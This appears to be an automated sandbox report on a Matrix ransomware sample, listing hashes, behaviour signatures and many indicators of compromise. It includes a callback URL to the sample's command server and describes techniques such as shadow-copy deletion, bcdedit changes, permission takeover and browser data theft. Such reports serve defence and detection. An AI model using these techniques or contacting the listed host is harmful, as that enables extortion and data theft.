matrix | afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40

Analysis

max time kernel
95s
max time network
92s
platform
windows7_x64
resource
win7v200722
submitted
15-10-2020 17:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
Size

1.2MB
MD5

b3b77dc22f4f656dd036d6dc3b43f6e2
SHA1

4dd84a6c87e777ad12aeb38c0bba81892c5e464d
SHA256

afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40
SHA512

627c50a17ed35765864da2755782813d90e700c568af5fa3e6feca840a035c99b4f7352ef70ef1191bf9bf78d7e26bacbbb6f31416bcebe757a2fbfe7e592b87

Score

10^/10

matrix discovery evasion persistence ransomware spyware upx

Malware Config

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	flow	ioc	Process
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jre7\lib\amd64\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\db\bin\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files (x86)\Mozilla Maintenance Service\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Public\Music\Sample Music\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\skins\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Public\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Public\Videos\Sample Videos\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jre7\lib\zi\Asia\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Roaming\Microsoft\Protect\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jre7\lib\zi\Etc\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\Videos\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\Favorites\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\datareporting\archived\2020-07\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Public\Downloads\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Mozilla Firefox\uninstall\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\plugins\access\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\ProgramData\Microsoft Help\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
HTTP URL	4	http://sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=UCQFZDUI\|Admin&sid=Wm4vIhN3v9iqkG0j&phase=[ALL]7A713A4D4667195C	Process not Found
File created		C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\default\moz-extension+++74bf55e1-f8f0-4b8e-ae67-9c4088745841^userContextId=4294967295\idb\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
572	bcdedit.exe
1260	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	Q0OgcQKV64.exe

Executes dropped EXE 64 IoCs

pid	Process
1816	NWfdXYud.exe
1920	Q0OgcQKV.exe
828	Q0OgcQKV64.exe
1748	Q0OgcQKV.exe
1816	Q0OgcQKV.exe
472	Q0OgcQKV.exe
776	Q0OgcQKV.exe
1900	Q0OgcQKV.exe
1944	Q0OgcQKV.exe
956	Q0OgcQKV.exe
920	Q0OgcQKV.exe
592	Q0OgcQKV.exe
972	Q0OgcQKV.exe
1216	Q0OgcQKV.exe
1940	Q0OgcQKV.exe
1128	Q0OgcQKV.exe
1628	Q0OgcQKV.exe
924	Q0OgcQKV.exe
964	Q0OgcQKV.exe
972	Q0OgcQKV.exe
568	Q0OgcQKV.exe
300	Q0OgcQKV.exe
1844	Q0OgcQKV.exe
1004	Q0OgcQKV.exe
1952	Q0OgcQKV.exe
776	Q0OgcQKV.exe
972	Q0OgcQKV.exe
1884	Q0OgcQKV.exe
1460	Q0OgcQKV.exe
1004	Q0OgcQKV.exe
1648	Q0OgcQKV.exe
924	Q0OgcQKV.exe
1644	Q0OgcQKV.exe
1884	Q0OgcQKV.exe
1096	Q0OgcQKV.exe
1004	Q0OgcQKV.exe
1680	Q0OgcQKV.exe
924	Q0OgcQKV.exe
1564	Q0OgcQKV.exe
1844	Q0OgcQKV.exe
968	Q0OgcQKV.exe
1492	Q0OgcQKV.exe
952	Q0OgcQKV.exe
924	Q0OgcQKV.exe
1568	Q0OgcQKV.exe
2036	Q0OgcQKV.exe
1028	Q0OgcQKV.exe
1596	Q0OgcQKV.exe
952	Q0OgcQKV.exe
956	Q0OgcQKV.exe
1568	Q0OgcQKV.exe
1460	Q0OgcQKV.exe
1884	Q0OgcQKV.exe
1980	Q0OgcQKV.exe
1984	Q0OgcQKV.exe
1620	Q0OgcQKV.exe
1568	Q0OgcQKV.exe
1460	Q0OgcQKV.exe
1608	Q0OgcQKV.exe
1596	Q0OgcQKV.exe
920	Q0OgcQKV.exe
2024	Q0OgcQKV.exe
1096	Q0OgcQKV.exe
1440	Q0OgcQKV.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0003000000013196-17.dat	upx
behavioral1/files/0x0003000000013196-18.dat	upx
behavioral1/files/0x0003000000013196-20.dat	upx
behavioral1/files/0x0003000000013196-29.dat	upx
behavioral1/files/0x0003000000013196-31.dat	upx
behavioral1/files/0x0003000000013196-32.dat	upx
behavioral1/files/0x0003000000013196-34.dat	upx
behavioral1/files/0x0003000000013196-39.dat	upx
behavioral1/files/0x0003000000013196-41.dat	upx
behavioral1/files/0x0003000000013196-42.dat	upx
behavioral1/files/0x0003000000013196-44.dat	upx
behavioral1/files/0x0003000000013196-49.dat	upx
behavioral1/files/0x0003000000013196-51.dat	upx
behavioral1/files/0x0003000000013196-52.dat	upx
behavioral1/files/0x0003000000013196-54.dat	upx
behavioral1/files/0x0003000000013196-59.dat	upx
behavioral1/files/0x0003000000013196-61.dat	upx
behavioral1/files/0x0003000000013196-62.dat	upx
behavioral1/files/0x0003000000013196-64.dat	upx
behavioral1/files/0x0003000000013196-69.dat	upx
behavioral1/files/0x0003000000013196-71.dat	upx
behavioral1/files/0x0003000000013196-72.dat	upx
behavioral1/files/0x0003000000013196-74.dat	upx
behavioral1/files/0x0003000000013196-79.dat	upx
behavioral1/files/0x0003000000013196-81.dat	upx
behavioral1/files/0x0003000000013196-82.dat	upx
behavioral1/files/0x0003000000013196-84.dat	upx
behavioral1/files/0x0003000000013196-89.dat	upx
behavioral1/files/0x0003000000013196-91.dat	upx
behavioral1/files/0x0003000000013196-92.dat	upx
behavioral1/files/0x0003000000013196-94.dat	upx
behavioral1/files/0x0003000000013196-99.dat	upx
behavioral1/files/0x0003000000013196-101.dat	upx
behavioral1/files/0x0003000000013196-103.dat	upx
behavioral1/files/0x0003000000013196-105.dat	upx
behavioral1/files/0x0003000000013196-118.dat	upx
behavioral1/files/0x0003000000013196-120.dat	upx
behavioral1/files/0x0003000000013196-121.dat	upx
behavioral1/files/0x0003000000013196-123.dat	upx
behavioral1/files/0x0003000000013196-126.dat	upx
behavioral1/files/0x0003000000013196-128.dat	upx
behavioral1/files/0x0003000000013196-129.dat	upx
behavioral1/files/0x0003000000013196-131.dat	upx
behavioral1/files/0x0003000000013196-135.dat	upx
behavioral1/files/0x0003000000013196-137.dat	upx
behavioral1/files/0x0003000000013196-138.dat	upx
behavioral1/files/0x0003000000013196-140.dat	upx
behavioral1/files/0x0003000000013196-145.dat	upx
behavioral1/files/0x0003000000013196-147.dat	upx
behavioral1/files/0x0003000000013196-148.dat	upx
behavioral1/files/0x0003000000013196-150.dat	upx
behavioral1/files/0x0003000000013196-155.dat	upx
behavioral1/files/0x0003000000013196-157.dat	upx
behavioral1/files/0x0003000000013196-158.dat	upx
behavioral1/files/0x0003000000013196-160.dat	upx
behavioral1/files/0x0003000000013196-165.dat	upx
behavioral1/files/0x0003000000013196-167.dat	upx
behavioral1/files/0x0003000000013196-168.dat	upx
behavioral1/files/0x0003000000013196-170.dat	upx
behavioral1/files/0x0003000000013196-175.dat	upx
behavioral1/files/0x0003000000013196-177.dat	upx
behavioral1/files/0x0003000000013196-178.dat	upx
behavioral1/files/0x0003000000013196-180.dat	upx
behavioral1/files/0x0003000000013196-185.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
1928	cmd.exe
1920	Q0OgcQKV.exe
956	cmd.exe
432	cmd.exe
1484	cmd.exe
972	cmd.exe
1948	cmd.exe
2008	cmd.exe
1748	cmd.exe
1436	cmd.exe
1096	cmd.exe
992	cmd.exe
1924	cmd.exe
1588	cmd.exe
1620	cmd.exe
2028	cmd.exe
1564	cmd.exe
920	cmd.exe
1076	cmd.exe
1668	cmd.exe
1884	cmd.exe
1960	cmd.exe
1444	cmd.exe
1452	cmd.exe
560	cmd.exe
1744	cmd.exe
2036	cmd.exe
568	cmd.exe
1596	cmd.exe
1736	cmd.exe
992	cmd.exe
1888	cmd.exe
1160	cmd.exe
1044	cmd.exe
1444	cmd.exe
1668	cmd.exe
776	cmd.exe
1960	cmd.exe
2036	cmd.exe
1608	cmd.exe
1596	cmd.exe
1044	cmd.exe
992	cmd.exe
1668	cmd.exe
1884	cmd.exe
1960	cmd.exe
112	cmd.exe
1856	cmd.exe
1620	cmd.exe
1044	cmd.exe
1448	cmd.exe
1484	cmd.exe
1492	cmd.exe
1028	cmd.exe
992	cmd.exe
1128	cmd.exe
968	cmd.exe
1816	cmd.exe
1952	cmd.exe
1484	cmd.exe
1568	cmd.exe
972	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
824	takeown.exe
1996	takeown.exe
204	takeown.exe
1096	takeown.exe
1924	takeown.exe
964	Process not Found
1900	takeown.exe
1980	takeown.exe
596	takeown.exe
1076	takeown.exe
1808	takeown.exe
1964	takeown.exe
1648	takeown.exe
824	takeown.exe
1940	takeown.exe
1440	takeown.exe
1260	takeown.exe
1436	takeown.exe
1964	takeown.exe
968	takeown.exe
1044	takeown.exe
1644	takeown.exe
2012	takeown.exe
2020	takeown.exe
1076	Process not Found
1276	Process not Found
1700	takeown.exe
1700	takeown.exe
1440	takeown.exe
316	takeown.exe
1584	takeown.exe
2012	takeown.exe
1644	takeown.exe
924	takeown.exe
824	takeown.exe
940	takeown.exe
964	Process not Found
1564	takeown.exe
824	takeown.exe
472	Process not Found
1076	Process not Found
1404	takeown.exe
1004	takeown.exe
1588	takeown.exe
1996	takeown.exe
876	takeown.exe
1596	takeown.exe
1028	takeown.exe
1980	takeown.exe
2012	takeown.exe
1952	takeown.exe
1856	takeown.exe
1584	takeown.exe
1820	takeown.exe
1044	takeown.exe
1892	takeown.exe
824	takeown.exe
1384	takeown.exe
636	takeown.exe
1644	takeown.exe
1452	Process not Found
1904	takeown.exe
940	takeown.exe
1904	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 34 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Desktop\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Z1YRRYOY\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DUF815Z1\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YAUNGDT1\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JSOYQ5ME\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\M:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\N:	Q0OgcQKV64.exe
File opened (read-only)	\??\W:	Q0OgcQKV64.exe
File opened (read-only)	\??\X:	Q0OgcQKV64.exe
File opened (read-only)	\??\Z:	Q0OgcQKV64.exe
File opened (read-only)	\??\L:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\K:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\G:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\B:	Q0OgcQKV64.exe
File opened (read-only)	\??\S:	Q0OgcQKV64.exe
File opened (read-only)	\??\T:	Q0OgcQKV64.exe
File opened (read-only)	\??\Y:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\I:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\E:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\H:	Q0OgcQKV64.exe
File opened (read-only)	\??\V:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\H:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\L:	Q0OgcQKV64.exe
File opened (read-only)	\??\P:	Q0OgcQKV64.exe
